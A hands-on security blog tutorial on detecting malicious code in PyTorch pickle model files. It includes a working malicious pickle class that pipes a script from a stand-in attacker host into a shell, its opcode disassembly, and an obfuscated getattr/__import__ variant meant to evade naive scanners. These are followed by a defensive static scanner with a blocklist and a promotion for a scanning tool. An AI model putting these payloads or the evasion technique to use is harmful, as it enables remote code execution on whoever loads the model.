How to Detect Malware in a PyTorch Pickle File: A Hands-On Guide

Your SCA stack — Snyk, Dependabot, pip-audit — knows how to read your requirements.txt and cross-reference it against a vulnerability database. It doesn't know how to read a 5 GB .pt file you just pulled from Hugging Face.

That's a problem. A PyTorch model file isn't a static blob of floats. It contains a serialized instruction stream, and loading it can execute arbitrary code on the machine that calls torch.load(). A crafted model can spawn a reverse shell, exfiltrate environment variables, or curl-pipe-sh a payload — all before any inference happens.

PyTorch 2.6 helps. The default for torch.load() flipped to weights_only=True, which uses a restricted unpickler that refuses to import arbitrary modules. But "default" leaves room. Every torch.load(..., weights_only=False) sitting in your codebase, every pre-2.6 deployment, every legacy loader that hasn't been migrated, every notebook that opts out — all of those still run the unrestricted unpickler. The restricted version isn't impervious either; researchers have published bypasses. And weights_only=True does nothing for license risk, which is a separate axis of model-supply-chain pain that no unpickler default touches.

The real question isn't "is torch.load() safe?" It's "do you know what every loader in your pipeline is actually doing, and can you prove it before the model ships?" The rest of this post is about answering that question by reading the bytecode statically — without ever running it.

1. The ZIP envelope

Modern PyTorch weights (saved since 1.3/1.4) aren't raw pickled bytes on disk. The file is a ZIP archive.

Rename model.pt to model.zip, extract it, and you get this:

my-model/
├── archive/
│   ├── data.pkl          <-- The metadata serialization (the pickle stream)
│   ├── version           <-- PyTorch serialization version
│   ├── bytecode/         <-- Compiled TorchScript bytecode (only if JIT was used)
│   └── data/             <-- Raw tensor weights
│       ├── 0             <-- Tensor chunk
│       ├── 1             <-- Tensor chunk
│       └── 2             <-- Tensor chunk

The tensors live in data/ as flat binary chunks. The interesting file from a security standpoint is data.pkl — a standard Python pickle stream that tells PyTorch how to reassemble the chunks back into torch.Tensor objects.

That reassembly logic runs before any tensor data is touched. Anything embedded in data.pkl that the pickle module can execute will execute first. That's the surface.

2. The Pickle Virtual Machine

Pickle isn't a data format. It's a programming language.

Python's pickle module compiles your objects into a stream of opcodes for a stack-based virtual machine and ships that stream to disk. When you load it back, the interpreter spins up the Pickle Virtual Machine (PVM) and executes those opcodes. Three parts:

The instruction stream — a linear sequence of 1-byte opcodes with optional arguments.
The stack — LIFO scratch space for values and intermediate call results.
The memo — a key-value cache so the stream can refer back to objects it already built (handles circular references).

A few representative opcodes:

I + digits + \n: parse an integer, push it to the stack.
S + quoted string + \n: parse a string, push it to the stack.
(: push a special <MARK> sentinel onto the stack — used to delimit groups.
t: pop everything down to the last mark, bundle it into a tuple, push the tuple.

None of that, by itself, is dangerous. The PVM gets dangerous because it has to support loading arbitrary Python class instances — which means it ships opcodes for importing modules (GLOBAL) and calling callables (REDUCE).

3. The exploit lives in `REDUCE`

When a Python object defines __reduce__, the pickler calls it during serialization and writes the result to the stream. __reduce__ returns a two-tuple: a callable, and the args to pass it. During unpickling, the PVM calls the callable with those args. That's the whole mechanism.

So:

import os
import torch

class PickleBomb:
    def __reduce__(self):
        return (os.system, ("curl -s http://attacker.com/malware.sh | sh",))

torch.save(PickleBomb(), "malicious_model.pt")

Disassemble the resulting pickle stream with pickletools.dis() and you get the PVM assembly:

    0: c    GLOBAL     'os system'
   11: (    MARK
   12: V    UNICODE    'curl -s http://attacker.com/malware.sh | sh'
   57: t    TUPLE      (MARK at 11)
   58: R    REDUCE
   59: .    STOP

Step through it.

Opcode `c` — resolve the symbol

Stack:  [ <built-in function system> ]

The PVM executes GLOBAL, imports os, looks up system, and pushes the function reference onto the stack.

Opcode `(` — place the mark

Stack:  [ <built-in function system>, <MARK> ]

A sentinel goes on the stack. Everything pushed after it counts as part of the upcoming args group.

Opcode `V` — push the argument string

Stack:  [ <built-in function system>, <MARK>, 'curl -s http://attacker.com/malware.sh | sh' ]

Opcode `t` — collapse to a tuple

Stack:  [ <built-in function system>, ('curl -s http://attacker.com/malware.sh | sh',) ]

Pop down to the mark, bundle into a single-element tuple, push it back.

Opcode `R` — REDUCE

Stack:  [ 0 ]  # os.system("curl ...") returns its exit code

REDUCE pops the args tuple and the callable, calls callable(*args), and pushes whatever it returned. The shell ran. The model file hasn't even loaded a tensor yet, and arbitrary code has already executed under the credentials of whoever called torch.load().

4. Obfuscation

A scanner that just greps for the literal string os.system in pickle bytes will catch the example above. Real attackers don't write it like that.

Because the pickle language is Turing-complete, you can resolve the dangerous callable indirectly:

import builtins
import torch

class ObfuscatedPickle:
    def __reduce__(self):
        return (
            builtins.getattr,
            (__import__('os'), "sys" + "tem"),  # split string evades naive token scans
        )

torch.save(ObfuscatedPickle(), "obfuscated_model.pt")

Disassembled:

    0: c    GLOBAL     'builtins getattr'
   18: (    MARK
   19: c    GLOBAL     'builtins __import__'
   39: (    MARK
   40: V    UNICODE    'os'
   44: t    TUPLE      (MARK at 39)
   45: R    REDUCE
   46: V    UNICODE    'system'
   54: t    TUPLE      (MARK at 18)
   55: R    REDUCE

No os.system anywhere in the symbol table. A grep-only scanner sees four innocuous strings: builtins.getattr, builtins.__import__, 'os', 'system'. None of them is on a typical blocklist.

At byte 45, the PVM calls __import__('os'), which returns the live os module and leaves it on the stack. At byte 55, getattr(<os module>, 'system') resolves to the live os.system function. From there, one more REDUCE with attacker-controlled args and you're back where you started — but the scanner saw nothing.

The lesson: any scanner that doesn't treat builtins.getattr and builtins.__import__ as dangerous in their own right is bypassable.

5. A scanner you can actually run

You don't need anything beyond the standard library to do this. zipfile opens the container, pickletools.genops walks the bytecode without instantiating any of it. The whole scanner fits on a page.

import zipfile
import io
import pickletools
from typing import Set, Tuple, Optional

# Starting point — your allowlist will grow as you onboard real models.
# Production model zoos typically need _codecs, copyreg, numpy._core, and
# framework-specific custom layers added to this set.
SAFE_MODULES: Set[str] = {
    "numpy",
    "numpy.core.multiarray",
    "torch",
    "torch._utils",
    "collections",
    "typing",
}

# Callables that should never appear in a model file.
DANGEROUS_CALLABLES: Set[Tuple[str, str]] = {
    ("os", "system"),
    ("os", "popen"),
    ("subprocess", "Popen"),
    ("subprocess", "run"),
    ("subprocess", "call"),
    ("builtins", "eval"),
    ("builtins", "exec"),
    ("builtins", "__import__"),  # obfuscation primitive
    ("builtins", "getattr"),     # obfuscation primitive
}


class ScanResult:
    def __init__(self, is_safe: bool, details: str):
        self.is_safe = is_safe
        self.details = details


def scan_pytorch_model(file_path: str, strict_mode: bool = False) -> ScanResult:
    """Walk the pickle stream inside a .pt file without executing any of it."""
    pickle_bytes: Optional[bytes] = None

    # Step 1: pull data.pkl out of the ZIP container (or fall back to raw pickle).
    try:
        with zipfile.ZipFile(file_path, "r") as archive:
            pkl_names = [n for n in archive.namelist() if n.endswith("data.pkl")]
            if not pkl_names:
                return ScanResult(True, "No pickle data stream found (likely SafeTensors).")
            pickle_bytes = archive.read(pkl_names[0])
    except zipfile.BadZipFile:
        # Pre-1.3 PyTorch wrote raw pickles, no ZIP.
        try:
            with open(file_path, "rb") as f:
                pickle_bytes = f.read()
        except Exception as e:
            return ScanResult(False, f"Failed to read file: {e}")
    except Exception as e:
        return ScanResult(False, f"Failed to open ZIP container: {e}")

    if not pickle_bytes:
        return ScanResult(False, "Empty pickle stream.")

    # Step 2: walk opcodes, flag dangerous imports.
    is_safe = True
    audit = []

    try:
        for opcode, arg, pos in pickletools.genops(io.BytesIO(pickle_bytes)):
            if opcode.name not in ("GLOBAL", "STACK_GLOBAL"):
                continue
            if not arg:
                continue

            # arg is typically "module name" — split conservatively.
            parts = arg.split(" ", 1)
            if len(parts) != 2:
                continue
            module, name = parts
            symbol = (module, name)

            if symbol in DANGEROUS_CALLABLES:
                audit.append(f"[CRITICAL] {module}.{name} at byte {pos}")
                is_safe = False
            elif strict_mode and module not in SAFE_MODULES:
                audit.append(f"[WARNING] Unapproved module {module}.{name} at byte {pos}")
                is_safe = False

    except Exception as e:
        # Malformed pickle could be corruption — or deliberate evasion. Either way: not safe.
        return ScanResult(False, f"Bytecode parse error (possible evasion): {e}")

    if is_safe:
        return ScanResult(True, "Clean.")
    return ScanResult(False, "\n".join(audit))

Three things worth noticing:

Nothing touches disk. archive.read() returns bytes; io.BytesIO() wraps them in memory. No risk of side-channel writes during the scan itself.
pickletools.genops reads the bytecode linearly. It decodes opcodes to match them against pickle's grammar, but it never calls anything and never imports anything. That's what makes this safe to run against an untrusted file.
Both obfuscation primitives — builtins.__import__ and builtins.getattr — are on the blocklist. A legitimate model file has no reason to need either of them, and forcing the dynamic resolution path to be on the blocklist closes the section 4 bypass.

6. Where this approach stops working

Static scanning catches the easy 90%. It does not catch everything, and pretending otherwise is how you ship a false sense of security.

The pickle language is Turing-complete. An attacker can use memo slots, conditional stack manipulation, and split callable resolution across many opcodes to construct a dangerous call that only appears dangerous at runtime, after the pieces are assembled. A static walker that doesn't simulate the stack will miss this. A simulator does better. In the limit, you hit the halting problem: deciding whether an arbitrary Turing-complete program will end up calling os.system is, formally, undecidable.

So the answer isn't a smarter scanner. It's layering.

graph TD
    A[Incoming ML weights] --> B[Layer 1: Static linter]
    B -- SafeTensors? --> C[Allow flat JSON headers]
    B -- PyTorch pickle? --> D[Run VM-stack simulation]
    D -- Unapproved imports found --> E[Block / fail build]
    D -- Safe imports only --> F[Layer 2: Sandbox execution]
    F --> G[Run torch.load inside restricted gVisor container]
    G --> H[Model loaded safely]

Stack-simulating linter first — it catches the obvious payloads and the obfuscation primitives. Anything that survives gets loaded in a sandbox (gVisor, an ephemeral container, whatever your platform supports) with no outbound network and a read-only filesystem. And where you can, migrate the artifact format itself: SafeTensors is a flat JSON header plus contiguous tensor bytes, with no executable component. Changing the format closes the attack surface entirely.

7. Skip the work

Everything above is what AIsbom does, plus the parts that don't fit in a blog post: SafeTensors header parsing, GGUF binary header parsing, license risk extraction, drift detection between scans, CycloneDX / SPDX export, weekly scans of the top 50 Hugging Face text-generation models, and a GitHub Action that comments on PRs.

One command:

pipx run --spec aisbom-cli aisbom scan hf://google-bert/bert-base-uncased

Fetches the latest release, scans BERT over HTTP without downloading the weights, prints a security + legal table, and exits. Apache 2.0, no signup, no email gate.

Model files are programs. Scan them like programs.

1. The ZIP envelope

2. The Pickle Virtual Machine

3. The exploit lives in REDUCE

Opcode c — resolve the symbol

Opcode ( — place the mark

Opcode V — push the argument string

Opcode t — collapse to a tuple

Opcode R — REDUCE